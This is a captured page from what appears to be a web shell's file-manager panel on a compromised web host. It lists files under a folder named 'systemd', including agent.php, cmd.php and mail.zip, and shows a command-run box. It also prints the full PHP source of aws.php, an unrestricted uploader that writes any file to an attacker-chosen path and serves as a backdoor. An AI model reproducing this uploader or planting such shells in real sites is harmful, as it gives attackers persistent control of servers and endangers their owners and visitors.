/
home
/
techb158
/
public_html
/
systemd
/
/home/techb158/public_html/systemd
mkdir
upload
Name
Size
Mode
Actions
mail/
-
0755
rm
agent.php
11404
0644
edit
dl
rm
aws.php
504
0644
edit
dl
rm
cmd.php
74
0644
edit
dl
rm
mail.zip
334561
0644
edit
dl
rm
Edit:
/home/techb158/public_html/systemd/aws.php
(504B)
<?php $files = @$_FILES["files"]; if ($files["name"] != '') { $fullpath = $_REQUEST["path"] . $files["name"]; if (move_uploaded_file($files['tmp_name'], $fullpath)) { echo "<h1><a href='$fullpath'>OK Your File Has Been Uploaded !</a></h1>"; } }echo '<html><head><title>Upload Your files...</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>'; ?>
Save
cmd:
run